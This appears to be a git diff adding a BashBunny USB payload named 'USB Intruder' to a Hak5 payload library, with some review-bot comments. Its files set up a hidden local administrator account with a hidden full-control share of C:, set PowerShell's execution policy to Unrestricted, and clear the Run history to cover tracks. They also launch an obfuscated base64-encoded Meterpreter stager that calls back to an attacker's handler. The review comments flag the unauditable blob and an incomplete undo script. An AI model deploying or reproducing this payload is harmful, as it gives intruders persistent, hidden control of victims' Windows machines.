diff --git a/payloads/library/remote_access/USB_Intruder/README.MD b/payloads/library/remote_access/USB_Intruder/README.MD
new file mode 100644
index 00000000..5607c7cb
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/README.MD
@@ -0,0 +1,51 @@
+# USB Intruder for BashBunny (and adaptable to TwinDucky)
+
+- Title: USB Intruder
+- Author: B0rk
+- Version: 1.1
+- Target: Windows 7+
+- Props: Hak5Darren, Diggster, IMcPwn, and many more
+- Category: Infiltration/Execution
+
+## Description
+
+**THIS PAYLOAD ASSUMES YOUR VICTIM HAS ADMINISTRATOR PRIVILEGES**
+
+Infiltrates a target system and performs the following:
+
+Created a hidden ProgData folder in the %WinDir% (HID)
+Sets powershell execution to unrestricted (HID)
+Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the Windows directory (STORAGE)
+Launches seq1.ps1 that launches the following tasks in order
+Creates a new user with the following credentials - pwnie:dungothacked (UAC.bat)
+Sets new user pwnie to local Administrators group (UAC.bat)
+Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) (UAC.bat)
+Hides the new user pwnie from the logon screen (hide.ps1)
+Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload (eject.ps1)
+Executes a shell.bat file that a Meterpreter script that calls back to the Attacker's Handler (Create/Replace with your own)
+Cleans up the Run dialogue history (HID)
+Sync's the BashBunny for final removal (BB)
+
+**undo.bat is provided to reverse the creation actions above (in case you want to test)**
+
+**Be sure to have your handler ready to accept the incoming connection from the victim**
+
+## Configuration
+
+Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever payload you would like.
+
+There is always potential for additional scripts to be run from the seq1.bat file, so bolster it with additional jobs.
+
+**You will need to change delays accordingly to the profile of the victim's PC hardware.**
+
+## STATUS
+
+| LED | Status |
+| --------------- | ---------------- |
+| Solid White | Initialization |
+| Blue Flashing | HID/Storage Phase|
+| Yellow Flashing | Cleanup of Run |
+| Green Flashing | Sync/EOF |
+| Solid Green | 100% Complete |
+
+Discussion and Comments at https://forums.hak5.org/index.php?/topic/40981-payloadusb_intruder/
diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat b/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat
new file mode 100644
index 00000000..b99150b8
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat
@@ -0,0 +1,4 @@
+@echo OFF
+net user pwnie dungothacked /add
+net localgroup Administrators pwnie /add
+net share HACKED$=C:\ /grant:pwnie,FULL
\ No newline at end of file
diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1
new file mode 100644
index 00000000..53e18990
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1
@@ -0,0 +1,3 @@
+$BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter
+$driveEject = New-Object -comObject Shell.Application
+$driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject")
\ No newline at end of file
diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1
new file mode 100644
index 00000000..b29417a2
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1
@@ -0,0 +1,2 @@
+$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
+New-Item $path -Force | New-ItemProperty -Name pwnie -Value 0 -PropertyType DWord -Force
\ No newline at end of file
diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1
new file mode 100644
index 00000000..3f6f7d01
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1
@@ -0,0 +1,3 @@
+&"$Env:WinDir\ProgData\UAC.bat"
+&"$Env:WinDir\ProgData\hide.ps1"
+&"$Env:WinDir\ProgData\eject.ps1"
\ No newline at end of file
diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat b/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat
new file mode 100644
index 00000000..a9f02f5e
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat
@@ -0,0 +1,2 @@ +@echo off +if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") \ No newline at end of file 
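Review bot: shell.bat is committed as one Invoke-Expression over a deflated, base64-encoded string, and nothing in the commit records what that string decodes to, so neither a reviewer nor a user who runs the payload as shipped can audit what the sample does or where it connects. The README already tells users to replace this file with their own, so the repository should carry a placeholder that only documents the contract (it is started as `%WinDir%\ProgData\shell.bat` from payload.txt and selects the interpreter by `%PROCESSOR_ARCHITECTURE%`) rather than an unreviewable blob. If the encoded sample has to stay, add a `REM` header line naming the tool that produced it and where the decoded source lives, e.g. `REM generated from <PATH-TO-DECODED-SOURCE>; do not edit by hand`, so the blob can be regenerated and diffed instead of trusted.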
diff --git a/payloads/library/remote_access/USB_Intruder/d.cmd b/payloads/library/remote_access/USB_Intruder/d.cmd
new file mode 100644
index 00000000..65477328
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/d.cmd
@@ -0,0 +1,10 @@
+@echo OFF
+
+REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\
+set dst=%~dp0USB_Intruder
+
+REM Copying files from dst to %WinDir%\ProgData
+xcopy /C /Q /G /Y /S %dst%\*.* %WinDir%\ProgData\
+
+@cls
+@exit
\ No newline at end of file
diff --git a/payloads/library/remote_access/USB_Intruder/payload.txt b/payloads/library/remote_access/USB_Intruder/payload.txt
new file mode 100644
index 00000000..ccf2d5eb
--- /dev/null
+++ b/payloads/library/remote_access/USB_Intruder/payload.txt
@@ -0,0 +1,76 @@
+#!/bin/bash
+#
+#TITLE: USB Intruder
+#AUTHOR: B0rk
+#VERSION: 1.1
+#PROPS: Hak5Darren, Diggster, IMcPwn and many more
+#OS: Windows (Requires Powershell and Admin privs)
+#ATTACKMODES: HID STORAGE
+#
+#DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends**
+#
+#LED INDICATORS:
+#White - Initialization
+#Blue Blinking - HID/STORAGE Phase
+#Yellow Blinking - Cleanup
+#Green Blinking - Syncing BB for removal
+#Green - Attack Completion
+
+#Initialization - Setting AttackModes
+LED W
+ATTACKMODE HID STORAGE
+#Initialization Completed
+
+#Beginning of HID/STORAGE Phase
+LED B 10
+#Description::
+Q DELAY 2000
+Q GUI d
+Q DELAY 100
+Q GUI r
+Q DELAY 500
+Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 800
+Q STRING mkdir C:\\Windows\\ProgData
+Q ENTER
+Q STRING attrib +h C:\\Windows\\ProgData
+Q ENTER
+Q STRING powershell
+Q ENTER
+Q DELAY 800
+Q STRING Set-ExecutionPolicy Unrestricted
+Q ENTER
+Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+Q ENTER
+Q DELAY 2000
+Q STRING cd \$Env:WinDir\\ProgData
+Q ENTER
+Q STRING .\\seq1.ps1
+Q ENTER
+Q DELAY 1000
+Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat
+Q ENTER
+Q STRING exit
+Q ENTER
+Q STRING exit
+Q ENTER
+Q DELAY 500
+#End of HID/STORAGE Phase
+
+#Cleanup
+LED Y 100
+#Clears complete run history
+Q GUI r
+Q DELAY 500
+Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+Q ENTER
+#End of Cleanup
+
+#Completion of script
+LED G 100
+sync
+LED G
+#Completed
diff --git a/payloads/library/remote_access/USB_Intruder/undo.bat b/payloads/library/remote_access/USB_Intruder/undo.bat
new file mode 100644
index 00000000..8fece0a8
--- /dev/null
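Review bot: The `#Description::` comment before the `Q` sequence is empty and the header only says `#OS: Windows (Requires Powershell and Admin privs)`, so the persistent changes this script leaves on the host are documented nowhere in the file: a hidden `C:\Windows\ProgData` directory, the machine execution policy switched to `Unrestricted`, a new hidden local administrator plus a full-control share of `C:\` created by the copied scripts, and the user's RunMRU history wiped. Fill `#Description::` with that ordered list and state which items undo.bat reverses (it removes the user, the share and the directory; it does not touch the execution policy, and the cleared RunMRU entries cannot be restored), so a tester can confirm a lab host was returned to its prior state. The `#Cleanup` comment should also say that the `Remove-ItemProperty ... -ErrorAction SilentlyContinue` step reports nothing on failure, since the LED sequence advances to green regardless.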
+++ b/payloads/library/remote_access/USB_Intruder/undo.bat
@@ -0,0 +1,3 @@
+net user pwnie /delete
+net share HACKED$ /delete
+RD /S /Q %windir%\ProgData
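Review bot: undo.bat does not reverse everything the payload changes: the `pwnie` value that hide.ps1 writes under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList` and the `Set-ExecutionPolicy Unrestricted` issued from payload.txt (if it took effect) both survive it, so a test host is left in a weakened state after "undo" despite the README's claim that it reverses the creation actions. Add `reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v pwnie /f` and document that the execution policy must be restored by hand to whatever it was before the run, since nothing in the payload records the previous value. The script also never checks the exit status of the `net` or `RD` commands, so a failed deletion is silent; at minimum each line should be followed by an `if errorlevel 1 echo ... >&2` so the tester sees what was not undone.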